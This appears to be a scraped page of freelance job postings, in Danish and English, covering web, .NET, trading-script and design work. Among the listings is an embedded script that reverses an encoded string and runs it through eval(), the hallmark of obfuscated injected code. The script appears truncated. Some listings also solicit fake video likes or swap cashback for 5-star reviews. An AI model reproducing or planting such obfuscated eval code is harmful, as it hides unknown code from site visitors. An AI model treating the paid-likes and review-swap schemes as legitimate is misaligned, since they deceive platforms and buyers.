saml 2.0 exampleJobs
Vi har et gammelt reservationssystem, som i processen skal sende et mail til os og kunden. Systemet er for 100 år siden, lavet i Classic ASP/Jmail men er nu flyttet til ny server uden Jmail, og skal derfor ændre til CDO.
...extract the (valid JSON) part only (Python or PHP). Starts with : {"data":{"question":{"pagedListDataConnection" Ends somewhere here : {"minSeq":"0","channel":"main-w-chan51-8888-react_uzonmseebkkzidac-MRb2","channelHash":"17978758530268586595","boxName":"chan51-8888","baseHost":"","targetUrl":"","enableWebsocket":true},"broadcastData":{"categoryToDepkeys":{"Viewer:isUniversalLoggedIn:Vmlld2VyQDA6MA==":["LIUS:d1a97be745ad05203c316c52e05659bc","LIUB:51c686f136238887af1ffc4ce43bb59d"]},"depkeyToVersion":{"LIUS:d1...
I have a simple custom indicator in thinkorswim and need converted for tradovate. I hope you have knowledge of trading software. Must start and finish within a few hours. Here is code from thinkorswim that needs to be converted input RiskUnit = 150; input buffer = .00; input digits = 0; def price = close(priceType = ); def candleRangeBull = price - low + buffer; def candleRangeBear = high - price + buffer; def BullRisk = (RiskUnit) / round(candleRangeBull); def BearRisk = (RiskUnit) / round(candleRangeBear); def BullRisk1 = rounddown(Bullrisk, digits); def BearRisk1 = rounddown(Bearrisk, digits); def o = open; AddLabel(yes, "Risk: " + AsDollars(RiskUnit) + " Ele : "+ (if price > o then BullRisk1 else BearRisk1), if price > o then else ); https://trado...
I have a simple custom indicator in thinkorswim and need converted for tradovate. I hope you have knowledge of trading software. Must start and finish within a few hours. Here is code from thinkorswim that needs to be converted input RiskUnit = 150; input buffer = .00; input digits = 0; def price = close(priceType = ); def candleRangeBull = price - low + buffer; def candleRangeBear = high - price + buffer; def BullRisk = (RiskUnit) / round(candleRangeBull); def BearRisk = (RiskUnit) / round(candleRangeBear); def BullRisk1 = rounddown(Bullrisk, digits); def BearRisk1 = rounddown(Bearrisk, digits); def o = open; AddLabel(yes, "Risk: " + AsDollars(RiskUnit) + " Ele : "+ (if price > o then BullRisk1 else BearRisk1), if price > o then else ); https://tr...
...= ()+1; var topSheetRows = (); //var sheetFolder = findFolder(targetFolderId,targetFolderName) var archiveFolder = findFolder(archivedProjectsFolderId,archivedProjectsFolderName) var values = (2,10,topSheetRows,1).getValues() var j=2; for(var i = 0 ; i < ; i ++){ var value = values[i][0]; if (value == ""){break;} var rowValueA = (j,1,1,11).getValues(); var rowValue = rowValueA[0] if(rowValue[5] == "Completed"){ var projectId = getIdFromUrl(("regroupsolutions","")); (projectId) var projectFile = null; try{ projectFile = (projectId); }catch(e){} //var projectFile = (projectId)
Hi Narola. I need to compile /rebuild project from Visual Studio. Can you help with that?
...everything can work with just easy clicks with simple choices (like 1, 2 or 3 hours) and possibly extra services not included in the base price. No where in the input section should it be asked that they put in something that requires use of keyboard... or more than the very simplest brain activity. So sliders and yes/no choices and 1 2 3 choices will have to do. Keep it simple. Make the slider blue from the beginning when you link to examples you've made for feedback. The slider (and output) will be "jumping" prices, not generic. Like postal code 0 to 2500 is base price, 2501 to 2700 plus 100kr, 2701-4000 plus 200kr, 4001-4300 plus 300, 4301-4999 plus 400 and over a certain postal it will only be possible to chose 2 hours for example...
Webudviklerens opgaver og ansvarsområder: • Skrivning af effektiv kode • Oprettelse ...tidsramme • Undersøgelse af forskellige softwareprogrammer, vedligeholdelse af softwaredokumentation • Implementering af beredskabsplaner, hvis webstedet går ned • Vedligeholdelse og udvidelse / forbedring af hjemmesiden, når den først er bygget Webudvikler jobkvalifikationer og krav • HTML / XHTML, CSS, JavaScript • Serverarkitektur • Erfaring med server-side rammer som python, ruby, php, Java, ASP, ASP.NET • Erfaring med databasesystemer som SQL og Oracle • Grundig funktionel viden og kodningserfaring • Grundlæggende kendskab til optimering af søgemaskiner • Evne til multitask med strenge ...
Design or formulate the financial analysis for a self storage project in order to ascertain its viability.
I need 2 posers done, for selling kayaks. Color: 4+0 Size: 79 x 119 cm Must look like summer & sun - thats is what we are selling. POSTER 1 TEXT: Header: Kajakken som alle kan sejle H2: Perfekt til sommerhuset H3: Sæt dig ned i den, og sejl afsted H4: Bestil idag, og vi leverer uden beregning. POSTER 2 TEXT: Header: Nem og stabil kajak H2: Til børn og voksne H3: Perfekt til sommerhuset H4: Bestil idag, og vi leverer uden beregning. I have uploaded some pictures for using. I have also uploaded a picture of the sign that the poster is for. Feel free to write me questions.
Hi, 1) site brake when i go to production mode. 2) on develper mode i have this erorr : net::ERR_ABORTED 404 Error: Script error for: Magento_Cookie/js/require-cookie at makeError () at ()
Note: Only applications from Scandinavia please. Jeg søger en udvikler der enten kan "renovere" og forny vores 14 år gamle jobsite kodet i klassisk asp eller kode et helt nyt site fra bunden og evt. brug af et CMS eller framework. Det nuværende site er kodet fra bunden og har en lang række avancerede features og dermed relativt høj kompleksitet. Sitet drives på fritidsbasis, men har potentiale og en stor brugerbase hvorfor der også skal kodes en nyt premium annonce facilitet som skal sikre indtægter ligesom tanken er at udbrede sitet med flere sprogversioner udover dansk. Af samme årsag kan jeg ikke betale de høje timetakster som bureauerne tager, men en lavere takst som er angivet her. For den re...
Opgavebeskrivelse Implementering af B2B portal i .Net Kunden skal implementerer en ny B2B portal. Det er en meget vigtig forretningsmæssig opgave som skal implementeres hen over 2018. Den bliver bygget fra grunden, men på kundens tekniske .Net rammeværk/fundament. Primære kompetence: Da vi har mange snitflader har vi behov for en udadvendt og kommunikerende person der ikke har problemer med at holde en del bolde i luften på samme tid. Konsulenten skal også være selvkørende og gerne have arbejdet agilt før. Faglige kvalifikationer: Skal være 100 meter mester i Angular4, men også meget gerne have forståelse for/udviklet lidt i .Net Erfaring: Meget gerne med lignende opgaver hen over ...
<script language="javascript" type="text/javascript">var lOI='==gCpkSKnw3JoQXasB3cucCdldmcvZmMyw3UVJjM8FTZslHdzBXYydXby9mZyIDfyR3QzwXZ1JHdyIDfn5Wa0RXZ2JjM8NXZnFWbpxXek9mY0N0M8hGdhBVZ function OO0(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += (i);} return ret; }eval(lO0(OO0(lOI)));</script>
Vi har en programmør på projektet der er blevet syg. Vi har en næsten færdig prototype der dog mangler: At man kan skrive beskeder til hinanden. Integration med betalingsgateway Promoter/referral system At man kan søge efter et kursus eller event. Venneliste / favorites Chat funktion Forum Blog Rating funktion a la trustpilot Prototypen kører på .Net Mssql database, C# og lavet i Umbraco CMS. Giv et bud på færddiggørelse af projektet og også et bud på at lave hjemmesiden fra bunden af.
Mit firma hedder LifeCraft og sælger viden om hvordan man frigør sin livskraft og opgraderer sit liv. Jeg vil have et logo der ligner ringe i vandet, i guld - og guldet skal se så ægte ud som muligt. Evt kan ringene rundes så det former en klode? Kom med oplæg, jeg glæder mig til at se det :0)
I need you to create a form with two rows the form consists of the following that can be ticked, for the ticked items a result has to be shown apon submission: 0-7 show green circle. du har lavt stress niveau 8-14 show yellow circle, du har middel stress niveau 15-21 show red circle, du har højt stress niveau 22+ show Red/Black circle, du har ekstremt højt stress niveau Items to tick are listed below, the form has to be made so it Works on our website in wordpress Hovedpine (migræne eller spæninger) Rygsmerter spændte muskler Nakke og skulder smerter Spændinger i kæben Muskel Kramper Nervøs mave andre smerter Kvalme Træthed, mangel på energi Kolde h&ae...
Til et projekt til børn ønskes små historier skrevet der tilknytter sig til nogle danske sange. For eksempel indgår Den Blå Anemone som en af sangene og der skal skrives en lille eventyragtigt historie. Der skal skrives ca. 8 historier på max 4 linier pr. historie. Versform er også en mulighed. Der vil være en sommerfugl som er den gennemgående figur. Der vil være musik og b...tilknytter sig til nogle danske sange. For eksempel indgår Den Blå Anemone som en af sangene og der skal skrives en lille eventyragtigt historie. Der skal skrives ca. 8 historier på max 4 linier pr. historie. Versform er også en mulighed. Der vil være en sommerfugl som er den gennemgående figur. Der vil være musik ...
Hej Jeg søger en free lancer til følgende opgave: 1) Hjemmeside (design og indhold finder vi ud af i fællesskab) 2) Login (må kun bestå af bestemte bogstaver) 3) Inde på siden skal der kunne uploades dokumenter (word eller pdf) 4) Det skal være nemt for andre brugere at finde frem til ovenstående dokumenter 5) Brugere skal kunne downloade dokumenterne 6) Brugere skal kunne rate dokumenter (f.eks. stjerner fra 1-5) 7) Dokumenter skal kunne sorteres via forskellige filtre (årstal, forfatter, navn etc.) 8) Der skal være toplister over bedst ratede dokumenter i hver "filter"/tema 9) Hver bruger skal have begrænset plads til at gemme dokumenterne tilknyttet deres personlige database. 10) Bruger skal ...
Jeg skal lave en prissammenligningsside. Jeg har samlet alle priser hos en forhandler og skal nu have fundet de samme produkter hos andre forhandlere. Jeg har lavet et excel ark hvor jeg liste alle URLs til den primære forhandler. Det er så jeres opgav...skal nu have fundet de samme produkter hos andre forhandlere. Jeg har lavet et excel ark hvor jeg liste alle URLs til den primære forhandler. Det er så jeres opgave at gå ind og finde det tilsvarende produkt hos de andre forhandlere og indsætte links i Excel arket. For at produkterne er de samme skal I tjekke at billedet er ens. Hvis I ikke kan finde det pågældende produkt skal der bare skrives 0 i cellen. Se vedhæftede fil for hvordan templaten ser ud. Det drejer sig ci...
Jeg har hjemmesiden Der er til siden designet en funktion hvor jeg som admin kan lave færdige træningsprogrammer til brugerne på siden. Denne feature er lavet i HTML/ASP med JavaScripts og skal nu implementeres på hjemmesiden. Siden kører i WordPress og der skal laves en nem side i WordPress backend til at administrere og oprette træningsprogrammer ud fra de øvelser som findes på siden.
500 VIDEO LIKES TO THE FOLLOWING VIDEO = (start at 0 ) + 500 VIDEO LIKES TO THE FOLLOWING VIDEO = (start at 0 ) + 500 VIDEO LIKES TO THE FOLLOWING VIDEO = ( start at 195 ) + 500 VIDEO LIKES TO THE FOLLOWING VIDEO = ( start at 2,480 ) +
I need a Microsoft ASP.NET Developer with experience in graphic and layout optimization. My ongoing project features an organization chart that currently doesn't fit on a single page. Key Tasks: - Adjust the layout of the chart to a vertical orientation. - Ensure the chart fits within a single page. Ideal Skills: - Proficiency in ASP.NET and Microsoft .NET Framework. - Expertise in graphical layouts and responsive designs, including jQuery. - Experience with SQL database integration for handling chart data. - Ability to deliver a quick and efficient solution. Most Important: - The chart should be responsive primarily for desktop computers. If you have the relevant expertise and can assist, please get in touch.
...leveraging their expertise, visibility, and customer base. You’ll handle the listing and selling of my items, and I’ll take care of the shipping once a sale is made. What You’ll Do: 1. List My Items on Your eBay Store 2. Use your established eBay account to list my items for sale. 3. Create attractive, optimized listings to maximize visibility and sales. Handle Buyer Communication: - Respond to buyer inquiries promptly and professionally. - Provide excellent customer service during the transaction process. Send Me the Sale Proceeds: - After a sale is made, you’ll forward the net proceeds (minus your agreed-upon commission) to me. I’ll Handle Shipping: - Once I receive the sale proceeds, I’ll take care of packaging and shipping t...
I am offering a service where you can purchase 2 Squarespace .com or .net domains (2-year term) along with a 2-year subscription to HostPapa’s CPanel-based Startup Hosting Plan (supports up to 10 sites). Total Cost: only $55 - Cashback 10-30Aud The Actual Worth of these products is $120+ Upon successful completion of the order, I will provide a 10-30 AUD cashback and kindly request a 5-star rating. What I Need From You: • Post an order for a budget of $55 usd, specifying the need for 2 domains and premium web hosting and only Hire me for this Package Highlights: • Domains Usage: Domains can be used for any legitimate purpose and are subject to a manual review. • Reliable Hosting: HostPapa's hosting offers excellent performance fo...
I'm looking for an experienced VB.NET programmer to help me with a legacy application. There is a laptop client and a server-side program that must all be managed. There are a few features I need to finish up. We are also going to be rewriting the app to .NET Core which has been started so I could use some help there as well. However, most important is VB.NET. This is only part-time.
...own** and find **the optimal trading timing**. ### 2. **Prepare necessary data** Since the AI must learn based on stock data, it is important to **prepare** stock data first. - **Stock price data**: Prepare the **opening price**, **closing price**, **high price**, **low price**, and **trading volume** data of the stock. - **Technical indicators**: Create various **technical indicators** for the stock data. For example, **Moving Average (MA)**, **Relative Strength Index (RSI)**, **MACD**, **Bollinger Bands**, etc. - **API Utilization**: To obtain stock data, you can use **Yahoo Finance API**, **Alpha Vantage API**, **Quandl**, etc. to get real-time data, or save data locally as a **CSV file**. ```python import yfinance as yf # Example: 5 years of Apple stock da...
...project involves developing a front-end interface that allows users to upload student forms, which will then be processed by the OpenText Intelligent Capture server using Captiva REST services with .NET. The uploaded documents will be analyzed to extract specific information. Key requirements: - Users will upload student forms in various formats, primarily PDF, Word documents, and Images. - The system needs to capture and display form fields from these documents on the next page. - Essential form fields to capture include educational details. Ideal skills and experience: - Proficiency in .NET and experience with Captiva REST services. - Familiarity with OpenText Intelligent Capture server. - Strong front-end development skills. - Experience in document processing and dat...
I need a Python script that selects bars from a table based on their close proximity. 1. i provide the list of bar names in a city / country 2. find bars / clubs in table that are in close proximity using google api to find lat/lon of venue 3. compile a list of 2 bars and 1 club in close proximity 4. use python code to update starting time of activity in itinerary suggested greedy algorithm, 1. replace a venue from the existing set that has maximum distance to other venues 2. stop iteration when net distance below some threshold Ideal Skills: - Proficiency in Python - Experience with data manipulation and analysis - Ability to work with various data formats Please note that I have not yet finalized all the specifics of the project, but I am open to discuss...
I'm OK to have less bids. In fact without SEO if you can not increase traffic don't bid. Dont sell me SEO. It will be done by someone. Don't ask me for SEO/ meeting. If I send email to 20 people in family to see site via email or whatsapp, it will work for $0. What will you do? If I have time, I can put a flyer in mail boxes of local houses in USA - cost my time and flyer print out cost.. Think outside the box. ofcourse you can not say exact # of traffic//.range is fine/./ what will you do for cost is fine. I’m looking for a professional who can help increase real traffic to my website. The primary goal is to attract more visitors, specifically USA based adults or retail investors, to my site. This project is looking for quality bids for an amount of a m...
...interplay of forces we often resist. Within us, harmony is the alignment of mind, body, and breath—a fragile equilibrium forged through struggle and surrender. To touch it is not to control but to understand: we are not separate from the world’s rhythm; we are its echo. Harmony is not perfection. It is the truth of interconnection. It is the story of life itself."* Scene Descriptions Opening Scene (0–10 seconds): A slow, aerial shot of a vast desert, the sun low on the horizon casting long shadows. The camera pans to reveal a single tree thriving in isolation. Transition (10–20 seconds): A macro shot of dew forming on the edge of a leaf, each droplet trembling before falling. The camera follows the drop as it merges with others in a flowing stream...
...(connected via public key). Total value of tokens held, updated in real-time (in USD). Available SOL balance in the wallet. Real-Time Data Integration: Fetch token prices via APIs (CoinGecko, CoinMarketCap, or any reliable API). On-chain data from Solana (via RPC endpoint or Solana API for wallet and pool data). Interactive Dashboard: Visual representation of data (impermanent loss, position values, net earnings). Tables with detailed summaries of positions. Overall performance report (profit/loss) that updates automatically. Customizability: Ability to input the wallet public key to easily monitor other positions. Flexibility to add new pools or tokens. The ideal candidate will have a strong background in Python, blockchain technology, and data visualization. Experience with... with their session authentication cookie. The job application data will be sourced from the user's profile on a configuration site, which should be built in .NET C# and integrated with Stripe for payment processing. Key Features: - Filters: The extension must apply filters based on job title, location, company size, employment type, post date, distance, industry, job benefits, job salary, companies, experience level, and job workplace. - Data Extraction: The extension should extract information from the user's resume, cover letter, contact information, and experience details. Please refer to the following for examples: - Example Chrome Extension: :%20Job%20Application%20Bot/pgnfaifdbfoiehcndkoeemaifhhbgkmm - Config panel: https://app
I am developing a .NET MAUI Blazor Hybrid Mobile App for a Zebra TC15 scanner. The app needs to process and decrypt data from scanned encrypted drivers license PDF417 barcodes. Key Requirements: - Integrate the Zebra scanner with the app (Android only) - Capture and decrypt full information from the PDF417 barcodes I need a developer with: - Proven experience in similar projects - Experience with Zebra scanners to get data from Drivers License Barcodes Please only apply if you can provide evidence of relevant past work.
I'm seeking a skilled C#/.NET developer to create a solution for a stand-alone EXE that converts the first page of MS Word and Adobe Acrobat PDF documents into a JPG thumbnail. Key requirements: - The EXE should accept an input and an output path via a command string, with the input path pointing to a multi-page document and the output path to the resulting JPG thumbnail. - The size of the output JPG file should be specified via command-line arguments, with the dimensions provided in pixels. Ideal candidates will have extensive experience with C# and the .NET Framework 4.8, as well as a strong understanding of document processing and image conversion. Please note that this project has a budget of $750.
I have a search bar but i want to scroll to when the page is loaded I can provide the full website files and i just need this scroll to work. if ( > 0) { (item => { const div = ('div'); = 'black'; // Set the background color to black (div); // Optionally, add the div to the document = 'file'; = ` <a href="#" class="file-link" data-file-path="${}" data-file-name="default" onclick="clearResults(); loadContent('${item
...too (you might need to install it, its super easy to use, quite some tutorials out there) Key tasks include: - Retipologizing the character model for optimal 3D printing - Cleaning the model until it shows 0 Errors in all cathegories of blenders 3D print addon that I circled in the screenshot (except the overhanging edges, but everything else needs to be 0) - no export needed, I just need the blender file back at the end when everything is cleaned up. Ideal candidates will have: - skills in blender modelling and typology - patience that I have not - deliver the finished blender file with 0 errors in the typology on time - blender model ready for 3D printing - include the word "potato" in your proposal of you will be ignored you can also use another sli...
...well Manually and Carefully for mutual Benefit instead of using Ai as Ai Can;'tunderstand whatever i am saying, I am offering a service where you can purchase 5 Squarespace .com or .net domains (1-year term) along with a 1-year subscription to HostPapa’s CPanel-based Premium Hosting Plan (supports up to 100 sites). Total Cost: $59 USD Upon successful completion of the order, you will receive a $10-30 AUD cashback, and we both benefit by exchanging 5-star reviews to enhance our Freelancer profiles. What I Need From You: 1. Post an order requesting 5 domains and 1-year premium web hosting for a $59 USD budget. 2. Agree to a manual review process to ensure the domains are used for legitimate purposes. 3. Provide a 5-star review after successful delivery of the serv...
I am offering a service where you can purchase 5 Squarespace .com or .net domains (1-year term) along with a 1-year subscription to HostPapa’s CPanel-based Premium Hosting Plan (supports up to 100 sites). Total Cost: $59 USD Upon successful completion of the order, you will receive a $15 AUD cashback, and we both benefit by exchanging 5-star reviews to enhance our Freelancer profiles. What I Need From You: 1. Post an order requesting 5 domains and 1-year premium web hosting for a $59 USD budget. 2. Agree to a manual review process to ensure the domains are used for legitimate purposes. 3. Provide a 5-star review after successful delivery of the service, and I will do the same for you. Why Choose This Service? • Mutual Benefit: Both parties enhance their Freelancer ...
...enhance my legacy telephony system, developed in Visual Studio 6.0 (C/C#) on Windows XP. This system currently processes SIP-based phone calls through softphones, connects to a SQL Server backend, and includes a middleware component in C and C# (.NET). Key Areas of Focus: - Enhancing the system features - Improving the SIP-based phone call processing - Upgrading the integration capabilities with other systems The ideal candidate should have: - Strong expertise in legacy Windows environments - Deep knowledge in telephony protocols - Proficiency in .NET technologies - Proven experience in modernizing and integrating older codebases I value your ability to maintain the current system stability while pushing for these enhancements. Experience with SIP call processing is a p...